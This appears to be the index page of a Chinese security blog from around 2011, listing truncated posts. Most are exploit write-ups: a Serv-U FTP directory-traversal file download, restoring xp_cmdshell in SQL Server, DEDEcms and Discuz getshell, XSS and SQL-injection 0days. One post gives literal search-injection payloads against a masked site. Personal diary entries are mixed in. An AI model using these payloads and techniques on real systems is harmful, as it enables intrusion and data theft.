About

若世有仙魔二道,我必三跪九叩行万里,以求拜仙为师,若仙不收我,我必入魔,屠尽武林正道以明志。若魔已不收我,我必戮尽仙魔以雪耻。

By F4usT.

  • Dec

    2


    [*]----------------------------------------------------[*]
    Serv-U FTP Server Jail Break 0day
    Discovered By Kingcope
    Year 2011
    [*]----------------------------------------------------[*]

    /*
    通过构造..:/来遍历服务器目录,下载任意文件
    ...

    Nov

    23

    一、xp_cmdshell的删除及恢复

    1、判断xp_cmdshell是否存在

    (SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name ='xp_cmdshell')

    返回结果为1就ok

    2、恢复xp_cmdshell的方法

    删除扩展存储过过程xp_cmdshell的语句

    exec sp_dropextendedproc 'xp_cmdshell'

    ...

    Sep

    29

    窝窝团,尼玛的,坑爹呢。

    • 4 Comments
    • 个人随笔

    窝窝团,尼玛的,坑爹啊

    ...

    Aug

    18

    By:小A

        官方网址:http://www.reaft.com/

        Cms下载地址:http://www.reaft.com/html/1/200.html

        界面做的还不错,搜索了一下好像用的人很少,开始。

        首先看目录下 UpLoad.html 文件上传,调用了的是 UpLoad.asp。

    ...

    Aug

    11

    DEDEcms 拿shell EXP

    • 1 Comments
    • 漏洞收藏

    漏洞细节已经传遍了(http://www.t00ls.net/thread-17354-1-1.html),又没得玩了。T00LS7 @! ~" `, T( g2 ^5 T+ d
    ...

    Aug

    3

    栾川之行。

    • 0 Comments
    • 个人随笔

     

     

     

    ...

    Jul

    18

    搜索型字符注入

    • 0 Comments
    • 技术文摘

    SQL注入:http://www.*****.cn/ZW_index.aspx 
    搜索注入
    1、基本信息
    数据库版本:
    2011%' and 1=(select @@version) and '%'=''
    数据库连接用户:
    2011%' and user>0 and '%'='               

    ...

    Jul

    18

    安全性异常
    说明: 应用程序试图执行安全策略不允许的操作。要授予此应用程序所需的权限,请与系统管理员联系,或在配置文件中更改该应用程序的信任级别。

    异常详细信息: System.Security.SecurityException: 请求“System.Security.Permissions.SecurityPermission, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089”类型的权限已失败。

    ...

    Jun

    29

    Dz x 2.0 SqL 注射0day

    • 1 Comments
    • 漏洞收藏

    Jun

    25

    dedecms xss oday通杀所有版本

    • 1 Comments
    • 网络转载

     

    作者:haris

    漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell

    为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
    目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。

    下面说说利用方法。
    条件有2个:
    1.开启注册
    2.开启投稿

    注册会员----发表文章
    ...